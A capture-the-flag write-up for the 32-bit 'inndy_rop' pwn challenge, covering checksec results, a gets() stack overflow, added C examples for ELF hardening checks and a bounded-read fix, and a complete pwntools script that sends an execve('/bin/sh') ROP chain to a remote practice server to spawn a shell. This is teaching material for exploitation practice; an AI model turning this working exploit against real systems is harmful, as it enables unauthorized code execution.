inndy_rop
Ubuntu 16. Source: https://github.com/bash-c/pwn_repo
0x01
checksec
```
[*] '/home/zelas/Desktop/pwn/inndy_rop/rop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled          // stack is not executable
    PIE:      No PIE (0x8048000)
```
```
$ file rop
rop: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=e9ed96cd1a8ea3af86b7b73048c909236d570d9e, not stripped
```
Statically linked.
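The checksec and file verdicts above come straight from the ELF headers: "No PIE" is `e_type == ET_EXEC`, "NX enabled" is a `PT_GNU_STACK` program header without the `PF_X` flag, "Partial RELRO" is the presence of a `PT_GNU_RELRO` segment, and "statically linked" is the absence of a `PT_INTERP` header. The following is an added example (not from the original writeup or from the checksec tool) that derives those verdicts from a 32-bit ELF image; it reads the fields with explicit little-endian accessors so it depends on neither `<elf.h>` struct layout nor host endianness. The functions `inspect_elf32`, `build_sample_elf32` and `verdict_bits` are names chosen here, and the ELF images are constructed in memory so the code runs without the challenge binary.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ELF32 constants, same values as in <elf.h>; defined here to stay self-contained */
#define ET_EXEC      2
#define ET_DYN       3
#define PT_INTERP    3
#define PT_GNU_STACK 0x6474e551u
#define PT_GNU_RELRO 0x6474e552u
#define PF_X         1u
#define PF_W         2u
#define PF_R         4u
#define EHDR_SIZE    52   /* sizeof(Elf32_Ehdr) */
#define PHDR_SIZE    32   /* sizeof(Elf32_Phdr) */

typedef struct {
    int pie;      /* e_type == ET_DYN */
    int nx;       /* PT_GNU_STACK present and without PF_X */
    int relro;    /* PT_GNU_RELRO present (at least partial RELRO) */
    int dynamic;  /* PT_INTERP present: the binary needs ld.so */
} Hardening;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = v & 0xff; p[1] = v >> 8; }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (v >> (8 * i)) & 0xff; }

/* Inspect an in-memory little-endian ELF32 image. Returns 1 on success, 0 if
 * the magic/class is wrong or a program header lies outside the image. */
int inspect_elf32(const uint8_t *img, size_t len, Hardening *out)
{
    if (len < EHDR_SIZE || memcmp(img, "\x7f" "ELF", 4) != 0) return 0;
    if (img[4] != 1 /* ELFCLASS32 */ || img[5] != 1 /* ELFDATA2LSB */) return 0;
    memset(out, 0, sizeof *out);
    uint16_t e_type      = rd16(img + 16);
    uint32_t e_phoff     = rd32(img + 28);
    uint16_t e_phentsize = rd16(img + 42);
    uint16_t e_phnum     = rd16(img + 44);
    if (e_phentsize < PHDR_SIZE) return 0;
    out->pie = (e_type == ET_DYN);
    /* Without a PT_GNU_STACK header the kernel falls back to an executable
     * stack, so nx stays 0 unless the header is present and lacks PF_X. */
    for (uint16_t i = 0; i < e_phnum; i++) {
        size_t off = (size_t)e_phoff + (size_t)i * e_phentsize;
        if (off + PHDR_SIZE > len) return 0;
        uint32_t p_type  = rd32(img + off);
        uint32_t p_flags = rd32(img + off + 24);
        if (p_type == PT_GNU_STACK)      out->nx = !(p_flags & PF_X);
        else if (p_type == PT_GNU_RELRO) out->relro = 1;
        else if (p_type == PT_INTERP)    out->dynamic = 1;
    }
    return 1;
}

/* Constructed sample: a minimal ELF32 header followed by a PT_GNU_STACK header
 * with the given flags and, optionally, a PT_GNU_RELRO header. Returns the
 * image length, or 0 if the buffer is too small. */
size_t build_sample_elf32(uint8_t *buf, size_t cap, uint16_t e_type,
                          uint32_t stack_flags, int with_relro)
{
    uint16_t phnum = with_relro ? 2 : 1;
    size_t len = EHDR_SIZE + (size_t)phnum * PHDR_SIZE;
    if (cap < len) return 0;
    memset(buf, 0, len);
    memcpy(buf, "\x7f" "ELF", 4);
    buf[4] = 1; buf[5] = 1; buf[6] = 1;   /* ELFCLASS32, ELFDATA2LSB, EV_CURRENT */
    wr16(buf + 16, e_type);
    wr16(buf + 18, 3);                     /* EM_386 */
    wr32(buf + 20, 1);                     /* e_version */
    wr32(buf + 28, EHDR_SIZE);             /* e_phoff: table follows the header */
    wr16(buf + 40, EHDR_SIZE);
    wr16(buf + 42, PHDR_SIZE);
    wr16(buf + 44, phnum);
    uint8_t *ph = buf + EHDR_SIZE;
    wr32(ph, PT_GNU_STACK); wr32(ph + 24, stack_flags);
    if (with_relro) { ph += PHDR_SIZE; wr32(ph, PT_GNU_RELRO); wr32(ph + 24, PF_R); }
    return len;
}

/* Build, inspect, and pack the verdicts into bits (pie=1, nx=2, relro=4,
 * dynamic=8); returns -1 if the image could not be built or parsed. */
int verdict_bits(uint16_t e_type, uint32_t stack_flags, int with_relro)
{
    uint8_t img[EHDR_SIZE + 2 * PHDR_SIZE];
    Hardening h;
    size_t n = build_sample_elf32(img, sizeof img, e_type, stack_flags, with_relro);
    if (!n || !inspect_elf32(img, n, &h)) return -1;
    return h.pie | h.nx << 1 | h.relro << 2 | h.dynamic << 3;
}

int main(void)
{   /* same profile as the writeup's checksec output: ET_EXEC, RW stack, RELRO segment */
    int v = verdict_bits(ET_EXEC, PF_R | PF_W, 1);
    printf("RELRO: %s  NX: %s  PIE: %s  linking: %s\n", v & 4 ? "Partial" : "No",
           v & 2 ? "enabled" : "disabled", v & 1 ? "PIE" : "No PIE", v & 8 ? "dynamic" : "static");
    return v < 0;
}
```

Full RELRO additionally needs `DT_BIND_NOW` in the dynamic section, which a static binary does not have, so this check stops at the partial/no distinction that applies here.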
IDA
```c
int overflow()
{
  char v1[12];
  return gets(v1);
}
```
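`gets()` takes no length argument, so any line longer than 11 bytes walks past `v1[12]` into the saved ebp and the return address; that is the write the ROP chain below rides on. As an added example (not the challenge's own code), the following is the bounded replacement a fix would use: the same 12-byte buffer, read with `fgets()`, newline stripped, and the rest of an over-long line drained so the surplus cannot surface as the next input. The names `read_line_bounded`, `overflow_fixed`, `stream_from`, `read_from_string` and `second_line_after_overlong` are chosen here, and the inputs are constructed and fed through a temporary file so the behaviour can be checked without a terminal.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SZ 12   /* same size as v1[12] in the decompiled overflow() */

/* Read one line into buf (capacity size) without ever writing past it.
 * Returns the number of bytes stored (newline removed), or -1 at EOF with
 * nothing read. *truncated is set to 1 if the line had more bytes than fit;
 * those bytes are consumed so they cannot be misread as the next line. */
int read_line_bounded(FILE *in, char *buf, size_t size, int *truncated)
{
    *truncated = 0;
    if (size == 0 || fgets(buf, (int)size, in) == NULL) return -1;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[--n] = '\0';                  /* complete line: drop the newline */
    } else if (n == size - 1) {
        /* buffer filled with no newline seen: drain the remainder of the line */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n') *truncated = 1;
    }
    return (int)n;
}

/* The decompiled function with its read bounded; same 12-byte frame buffer. */
int overflow_fixed(void)
{
    char v1[BUF_SZ];
    int truncated;
    int n = read_line_bounded(stdin, v1, sizeof v1, &truncated);
    if (n >= 0) printf("got %d byte(s)%s: %s\n", n, truncated ? " (truncated)" : "", v1);
    return n;
}

/* Test helper: a readable FILE* holding the constructed text (ISO C tmpfile). */
static FILE *stream_from(const char *text)
{
    FILE *f = tmpfile();
    if (f && (fputs(text, f) == EOF || fseek(f, 0, SEEK_SET) != 0)) { fclose(f); f = NULL; }
    return f;
}

/* Test helper: one bounded read over constructed input. */
int read_from_string(const char *input, char out[BUF_SZ], int *truncated)
{
    FILE *f = stream_from(input);
    if (!f) return -2;
    int n = read_line_bounded(f, out, BUF_SZ, truncated);
    fclose(f);
    return n;
}

/* Test helper: after an over-long first line the second read must see the
 * next line, not the leftover bytes of the first. Returns line 2's length. */
int second_line_after_overlong(char out[BUF_SZ])
{
    FILE *f = stream_from("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nnext\n");  /* constructed */
    if (!f) return -2;
    int t;
    read_line_bounded(f, out, BUF_SZ, &t);      /* truncated to 11 bytes, rest drained */
    int n = read_line_bounded(f, out, BUF_SZ, &t);
    fclose(f);
    return n;
}

int main(void) { return overflow_fixed() < 0; }
```

Returning the length and a truncation flag lets the caller reject over-long input explicitly instead of silently processing a cut-off value, which is the usual follow-on bug once `gets()` is replaced by a bounded read.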
0x02
Approach
1. Generate the ROP chain with ropper or ROPgadget:
```
ROPgadget --binary inndy_rop --ropchain
ropper --file inndy_rop --chain execve
```
2. Overflow the buffer with the chain to get a shell.
0x03
exp
```python
from pwn import *
from struct import pack

context(log_level='debug', os='linux', arch='i386')
io = remote('node4.buuoj.cn', 27020)

def rop_chain():
    # Chain in the layout produced by `ropper --chain execve`; the gadget
    # roles in the comments are read off that template (pop eax / pop edx /
    # mov [edx], eax / pop ebx / pop ecx / int 0x80), not from disassembly.
    p = lambda x: pack('I', x)
    IMAGE_BASE_0 = 0x08048000          # static, non-PIE binary: fixed image base
    rebase_0 = lambda x: p(x + IMAGE_BASE_0)
    rop = b''
    # write "//bin/sh\0" into .data (0x080a2060), four bytes per store
    rop += rebase_0(0x00070016)        # pop eax; ret
    rop += b'//bi'
    rop += rebase_0(0x00026cda)        # pop edx; ret
    rop += rebase_0(0x000a2060)        # .data + 0
    rop += rebase_0(0x0000c66b)        # mov dword ptr [edx], eax; ret
    rop += rebase_0(0x00070016)
    rop += b'n/sh'
    rop += rebase_0(0x00026cda)
    rop += rebase_0(0x000a2064)        # .data + 4
    rop += rebase_0(0x0000c66b)
    rop += rebase_0(0x00070016)
    rop += p(0x00000000)               # NUL terminator
    rop += rebase_0(0x00026cda)
    rop += rebase_0(0x000a2068)        # .data + 8
    rop += rebase_0(0x0000c66b)
    # execve("//bin/sh", argv, envp) with argv and envp pointing at the NUL dword
    rop += rebase_0(0x000001c9)        # pop ebx; ret
    rop += rebase_0(0x000a2060)        # ebx = filename
    rop += rebase_0(0x00096769)        # pop ecx; ret
    rop += rebase_0(0x000a2068)        # ecx = argv
    rop += rebase_0(0x00026cda)        # pop edx; ret
    rop += rebase_0(0x000a2068)        # edx = envp
    rop += rebase_0(0x00070016)        # pop eax; ret
    rop += p(0x0000000b)               # eax = 11 (execve)
    rop += rebase_0(0x00027430)        # int 0x80
    return rop

shellcode = rop_chain()
padding = 0xc + 0x4                    # 12-byte v1 plus saved ebp
payload = flat(b'a' * padding, shellcode)
io.sendline(payload)
io.interactive()
```